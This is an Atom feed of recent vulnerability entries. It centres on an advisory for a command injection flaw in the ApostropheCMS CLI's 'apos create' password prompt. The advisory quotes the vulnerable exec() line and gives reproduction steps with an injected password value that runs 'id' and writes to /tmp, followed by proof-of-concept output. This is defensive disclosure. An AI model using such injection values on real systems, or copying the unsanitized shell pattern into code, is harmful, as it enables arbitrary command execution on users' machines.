<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-05T19:18:16.045510+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-326978</id>
    <title>EUVD-2026-326978</title>
    <updated>2026-10-05T19:18:16.095518+00:00</updated>
    <content>EUVD-2026-326978</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-326978"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-42853</id>
    <title>fkie_cve-2026-42853</title>
    <updated>2026-10-05T19:18:16.095554+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>ApostropheCMS is an open-source Node.js content management system. Versions of the @apostrophecms/cli package up to and including 3.6.0 contain a command injection vulnerability in the apos create command. User-supplied input from the password prompt is embedded directly into a shell command without proper sanitization or escaping. This allows execution of arbitrary commands on the host system. As of time of publication, no known patched versions are available.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-42853"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-hcwq-x9fw-8cfq</id>
    <title>GHSA-hcwq-x9fw-8cfq — @apostrophecms/cli: Command Injection in apos create via Unsanitized Password Input</title>
    <updated>2026-10-05T19:18:16.095587+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: @apostrophecms/cli</p>
<p>Summary</p>
<p>The @apostrophecms/cli package contains a command injection vulnerability in the apos create command.
User-supplied input from the password prompt is embedded directly into a shell command without proper sanitization or escaping.
This allows execution of arbitrary commands on the host system.</p>
<p>━━━━━━━━━━━━━━━━━━━━━━</p>
<p>Details</p>
<p>Vulnerable file: lib/commands/create.js
Location: Line 186</p>
<p>The CLI collects a password using an interactive prompt and passes it directly into a shell command.</p>
<p>Vulnerable code:</p>
<p>const response = await prompts({
type: 'password',
name: 'pw',
message: '🔏 Please enter a password:'
});</p>
<p>exec(echo "${response.pw}" | ${createUserCommand});</p>
<p>The value of response.pw is not validated, sanitized, or escaped before being used in exec().</p>
<p>This allows shell metacharacters such as ;, &amp;&amp;, and $() to break out of the intended command and execute arbitrary commands.</p>
<p>━━━━━━━━━━━━━━━━━━━━━━</p>
<p>Steps to Reproduce</p>
<p>1) Install the CLI
      npm install -g @apostrophecms/cli
2) Create a new project
      mkdir testproject &amp;&amp; cd testproject
      apos create mysite
3)When prompted for the admin password, enter
      "; id &gt; /tmp/apos_rce_proof.txt; echo "
4)Verify command execution
        cat /tmp/apos_rce_proof.txt</p>
<p>━━━━━━━━━━━━━━━━━━━━━━</p>
<p>Proof of Concept Output</p>
<p>uid=1000(vboxuser) gid=1000(vboxuser) groups=1000(vboxuser),27(sudo),984(docker)</p>
<p>This confirms arbitrary command execution with the privileges of the user running the CLI.</p>
<p>━━━━━━━━━━━━━━━━━━━━━━</p>
<p>Impac…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-hcwq-x9fw-8cfq"/>
  </entry>
</feed>
